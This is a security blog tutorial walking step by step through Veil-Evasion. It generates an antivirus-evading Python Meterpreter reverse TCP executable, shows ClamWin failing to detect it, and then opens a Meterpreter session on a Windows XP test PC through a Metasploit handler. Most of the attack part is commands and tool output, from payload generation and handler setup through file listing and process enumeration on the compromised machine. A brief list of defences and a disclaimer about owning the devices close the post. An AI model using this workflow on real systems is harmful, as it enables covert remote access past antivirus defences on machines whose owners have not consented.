Using Veil to bypass antivirus and disguise a Metasploit backdoor
After my second post, “Using Metasploit to Hack an Android Phone” (which you can read here), I received an outpouring of positive feedback, particularly on Twitter. One reader, @pvtcussol, asked whether I had ever used the tool Veil. At that stage I hadn’t, but I promised that as soon as I did I would document it all in a post, so @pvtcussol, this one’s for you!
@pvtcussol Thanks for the tip! I haven't played with Veil yet but when I do I'll make sure I document it in a post.
— The Security Sleuth (@Security_Sleuth) January 17, 2015
So what is Veil?
Veil is billed as a tool capable of bypassing the antivirus solutions commonly deployed on endpoints during penetration testing engagements. It does this by generating random, unique payloads for exploits; we can compare these payloads to polymorphic malware, which changes as it moves from host to host, giving it an advantage over traditional malware with a distinct signature that most antivirus solutions can pick up. Veil’s payloads are compatible with popular penetration testing frameworks like Metasploit, making them very easy to incorporate into your penetration testing toolkit.
A number of people have asked me why you would need such a powerful tool on a penetration test. There are several reasons, but I think the most significant is that skilled attackers will for the most part be using entirely custom exploits and tools, and there is a high probability that they have made sure those tools are either undetectable by antivirus solutions or have some mechanism to disable antivirus. Effectively, Veil makes you much stealthier when you use it, and your customers get more for their money, because your tools are capable of bypassing a first line of defence that wouldn’t stop a serious, dedicated and persistent attacker anyway.
With all of this in mind I decided to see how effective Veil was.
What I used
For this post I used the following devices and tools:
A PC running Windows XP SP2 with ClamWin installed (I used ClamWin primarily because it’s easy to install, but you could use any other antivirus solution in its place).
An 8GB SanDisk Bootable Flash drive with Kali Linux installed on it.
A PC with a Wireless card connected to my wireless network (to run Kali on).
As for setup:
Ensure that the Windows PC is connected to a local area network and make sure you know its IP address before starting.
Plug your bootable flash drive into a PC which is powered off and power it on (you may need to make sure that your PC checks for bootable media before booting from the hard disk).
Once the PC has booted into Kali Linux make sure it’s connected to the same local area network as the Windows PC.
This example carries out all of the following activities on a single network; it can be modified to work across multiple networks and on a range of devices.
As I do with any post that involves powerful tools, a disclaimer: I owned all of the devices used in this example. If you were to replicate this example with devices you do not own, or do not have the owner’s permission to use, it may be a criminal offence.
Setting up Veil
After doing some research I found that setting up Veil is quite easy (most *nix users could do it): you basically need to run the four commands below from your home directory. As you will see, I performed the Veil installation from Kali Linux.
root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
…. Output omitted ….
2015-02-08 18:47:11 (85.9 KB/s) - `master' saved [5490594/5490594]
root@kali:~# unzip master
…. Output omitted ….
root@kali:~# cd Veil-Evasion-master/setup
Now you will run through a lengthy but simple setup process. A portion of the setup process involves some GUI steps, just click “Next”, “Agree” and “Finished” where appropriate.
root@kali:~/Veil-Evasion-master/setup# ./setup.sh
…. Output omitted ….
[*] Ensuring this account owns veil output directory...
Now that Veil is installed you can try it out!
Generating a payload with Veil
Immediately after installing Veil I decided to generate a payload. You do this by running a Python script called “Veil-Evasion.py”, so here goes:
root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
When you start Veil you see a simple, straightforward menu. The first thing I did was list all of the payloads to see what was available; at the time of writing there were 39 payloads, but this number will keep growing over time:
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Main Menu

    39 payloads loaded

 Available commands:

    use         use a specific payload
    info        information on a specific payload
    list        list available payloads
    update      update Veil to the latest version
    clean       clean out payload folders
    checkvt     check payload hashes vs. VirusTotal
    exit        exit Veil

 [>] Please enter a command: list
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Available payloads:

    1)  auxiliary/coldwar_wrapper
    2)  auxiliary/pyinstaller_wrapper
    3)  c/meterpreter/rev_http
    4)  c/meterpreter/rev_http_service
    5)  c/meterpreter/rev_tcp
    6)  c/meterpreter/rev_tcp_service
    7)  c/shellcode_inject/flatc
    8)  cs/meterpreter/rev_http
    9)  cs/meterpreter/rev_https
    10) cs/meterpreter/rev_tcp
    11) cs/shellcode_inject/base64_substitution
    12) cs/shellcode_inject/virtual
    13) native/Hyperion
    14) native/backdoor_factory
    15) native/pe_scrambler
    16) powershell/meterpreter/rev_http
    17) powershell/meterpreter/rev_https
    18) powershell/meterpreter/rev_tcp
    19) powershell/shellcode_inject/download_virtual
    20) powershell/shellcode_inject/psexec_virtual
    21) powershell/shellcode_inject/virtual
    22) python/meterpreter/rev_http
    23) python/meterpreter/rev_http_contained
    24) python/meterpreter/rev_https
    25) python/meterpreter/rev_https_contained
    26) python/meterpreter/rev_tcp
    27) python/shellcode_inject/aes_encrypt
    28) python/shellcode_inject/arc_encrypt
    29) python/shellcode_inject/base64_substitution
    30) python/shellcode_inject/des_encrypt
    31) python/shellcode_inject/flat
    32) python/shellcode_inject/letter_substitution
    33) python/shellcode_inject/pidinject
    34) ruby/meterpreter/rev_http
    35) ruby/meterpreter/rev_http_contained
    36) ruby/meterpreter/rev_https
    37) ruby/meterpreter/rev_https_contained
    38) ruby/meterpreter/rev_tcp
    39) ruby/shellcode_inject/flat
After looking at the payloads I decided on number 26, the Meterpreter reverse TCP payload, mainly because I had used that payload before with Metasploit. Before choosing it I used the info command, which gives you a neat little write-up on the payload:
 [>] Please enter a command: info 26
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload information:

    Name:           python/meterpreter/rev_tcp
    Language:       python
    Rating:         Excellent
    Description:    pure windows/meterpreter/reverse_tcp stager, no shellcode

 Required Options:

    Name            Current Value   Description
    ----            -------------   -----------
    LHOST                           IP of the metasploit handler
    LPORT           4444            Port of the metasploit handler
    compile_to_exe  Y               Compile to an executable
    expire_payload  X               Optional: Payloads expire after "X" days
    use_pyherion    N               Use the pyherion encrypter
To pick a payload to generate, use the “use” command along with the number of the payload. After this, set LHOST (which should be the IP of the machine you are running Kali on) and then run the generate command.
 [>] Please enter a command: use 26
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 Payload: python/meterpreter/rev_tcp loaded

 Required Options:

    Name            Current Value   Description
    ----            -------------   -----------
    LHOST                           IP of the metasploit handler
    LPORT           4444            Port of the metasploit handler
    compile_to_exe  Y               Compile to an executable
    expire_payload  X               Optional: Payloads expire after "X" days
    use_pyherion    N               Use the pyherion encrypter

 Available commands:

    set         set a specific option value
    info        show information about the payload
    generate    generate payload
    back        go to the main menu
    exit        exit Veil

 [>] Please enter a command: set LHOST 192.168.0.14
 [>] Please enter a command: generate
After entering generate you will be prompted for a base name for the output files and for the type of executable the generator should produce:
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files: testPayload

 [?] How would you like to create your payload executable?

     1 - Pyinstaller (default)
     2 - Pwnstaller (obfuscated Pyinstaller loader)
     3 - Py2Exe

 [>] Please enter the number of your choice: 1
err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec
176 INFO: Testing for ability to set icons, version resources...
189 INFO: ... resource update available
191 INFO: UPX is not available.
1707 INFO: checking Analysis
1707 INFO: building Analysis because out00-Analysis.toc non existent
1707 INFO: running Analysis out00-Analysis.toc
1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1720 INFO: Searching for file msvcr90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1720 INFO: Searching for file msvcp90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1720 INFO: Searching for file msvcm90.dll
1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py
4082 INFO: Hidden import 'encodings' has been found otherwise
4084 INFO: Looking for run-time hooks
4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt
4911 INFO: checking PYZ
4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
4911 INFO: building PYZ out00-PYZ.toc
5546 INFO: checking PKG
5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
5546 INFO: building PKG out00-PKG.pkg
6628 INFO: checking EXE
6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing
6628 INFO: building EXE from out00-EXE.toc
6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe
=========================================================================
 Veil-Evasion | [Version]: 2.16.0
=========================================================================
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

 [*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe

 Language:          python
 Payload:           python/meterpreter/rev_tcp
 Required Options:  LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y  expire_payload=X  use_pyherion=N
 Payload File:      /usr/share/veil-output/source/testPayload.py
 Handler File:      /usr/share/veil-output/handlers/testPayload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)
So with the payload generated let’s move on to see if it gets picked up by a scanner.
How does Veil hold up under scanning?
Going back to my post “Using Metasploit to Hack an Android Phone”: to get a Meterpreter session on an Android phone I had to craft a Metasploit payload and disguise it as an .apk file so I could install it and open a Meterpreter session. Out of habit I generally keep the files and outputs I create when trying out new tools or working on potential blog posts, and all of the materials from that post were kept on a flash drive. Every single time I plug that drive into my Windows machine, I get the pop-up below:
So this exercise really does show that antivirus, despite what people say, does provide some real value for users. But watch what happens when we scan a Veil payload:
After seeing the above results I still couldn’t believe it wasn’t returning even the slightest hint of a warning, so I also tried copying over the Python files used to generate the malicious payload and scanning them. As you can see below, they also didn’t return any warnings:
Most Veil tutorials end here, with the author uploading the Veil payload to VirusTotal or a similar service despite being told not to by the authors of Veil. In this example I’m not going to upload the file to any online service; I am, however, going to go a step further and see how a Veil payload interacts with Metasploit.
So how do you use Veil with Metasploit?
I wanted to see how Veil works with Metasploit. Veil also supplies a handler to configure all of the Metasploit parameters, but in this case I decided to do it manually. I typed in the necessary commands and accessed the victim machine via the Meterpreter session created by the payload (a quick note here: before you get any access to the target machine, the victim has to have run the Veil payload).
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.14
LHOST => 192.168.0.14
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.0.14:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (769536 bytes) to 192.168.0.30
[*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.30:1045) at 2015-02-14 10:30:28 +0000

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
Once the session was ready I ran a few Meterpreter commands to verify that Veil had worked and had given me a session on the remote PC:
meterpreter > pwd
C:\Documents and Settings\victim\Desktop
meterpreter > get uid
[-] Unknown command: get.
meterpreter > getuid
Server username: XPTEST-0000000\victim
meterpreter > idletime
User has been idle for: 9 mins 7 secs
meterpreter > ls

Listing: C:\Documents and Settings\victim\Desktop
================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2015-02-13 23:08:15 +0000  .
40777/rwxrwxrwx   0        dir   2014-07-13 04:44:45 +0000  ..
100666/rw-rw-rw-  28521    fil   2006-02-28 12:00:00 +0000  Blue hills.jpg
100777/rwxrwxrwx  3512798  fil   2015-02-08 20:38:14 +0000  testPayload.exe
100666/rw-rw-rw-  1400     fil   2015-02-08 20:37:04 +0000  testPayload.py
100666/rw-rw-rw-  143      fil   2015-02-08 20:37:04 +0000  testPayload_handler.rc

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                   Path
 ---   ----  ----              ----  -------     ----                   ----
 0     0     [System Process]        4294967295
 4     0     System            x86   0
 352   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM    \SystemRoot\System32\smss.exe
 560   668   alg.exe           x86   0                                  C:\WINDOWS\System32\alg.exe
 600   352   csrss.exe         x86   0           NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\csrss.exe
 624   352   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM    \??\C:\WINDOWS\system32\winlogon.exe
 668   624   services.exe      x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\services.exe
 680   624   lsass.exe         x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\lsass.exe
 832   668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\svchost.exe
 912   668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1004  1028  wscntfy.exe       x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\wscntfy.exe
 1012  1676  cmd.exe           x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\cmd.exe
 1028  668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\System32\svchost.exe
 1068  1028  wuauclt.exe       x86   0           XPTEST-0000000\victim  C:\WINDOWS\system32\wuauclt.exe
 1108  668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1184  668   svchost.exe       x86   0                                  C:\WINDOWS\system32\svchost.exe
 1192  1676  testPayload.exe   x86   0           XPTEST-0000000\victim  C:\Documents and Settings\victim\Desktop\testPayload.exe
 1200  1192  testPayload.exe   x86   0           XPTEST-0000000\victim  C:\Documents and Settings\victim\Desktop\testPayload.exe
 1388  668   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\system32\spoolsv.exe
 1496  668   svchost.exe       x86   0           NT AUTHORITY\SYSTEM    C:\WINDOWS\System32\svchost.exe
 1676  1624  explorer.exe      x86   0           XPTEST-0000000\victim  C:\WINDOWS\Explorer.EXE
 1940  1676  ClamTray.exe      x86   0           XPTEST-0000000\victim  C:\Program Files\ClamWin\bin\ClamTray.exe
As you can see it worked!
How you can protect against this
Normally in this section I provide a brief rundown of protective and preventative measures to help stop the above from happening. I will do that, but in addition I just want to say that I hope most small and medium businesses/organisations are seriously looking at more protection methods than just endpoint protection and firewalls, because most of the tools out there are capable of bypassing those.
Now back to the prevention/protection methods:
Lock down PCs as much as possible. If the above machine had been locked down it would have been much harder to collect information from it, say if you were able to gain access to a sysadmin’s machine, though that depends on what information the attackers are looking for.
Exercise healthy suspicion – don’t run any executables unless you know where they came from. Personally.
Vet suspicious files through a virtual machine or test environment where they won’t be able to cause any harm.
Avoid visiting risky or illegal sites; it’s likely that miscreants with malicious intent are using them to spread their malware.
Use some extra software in addition to antivirus, e.g. anti-spyware protection.
Make sure your system is always up to date; this goes a long way towards keeping your machine secure.
Keep regular backups so you can roll back to them if all of the above fails.
Resources
http://www.behindthefirewalls.com/2013/09/how-to-bypass-antivirus-using-veil-on.html
https://www.christophertruncer.com/
https://sathisharthars.wordpress.com/2014/06/07/evading-antivirus-using-veil-framework-in-kali-linux/
https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/
Please let me know if you found this article useful or if you didn’t; leave a comment below to let me know another area you would be interested in reading posts about.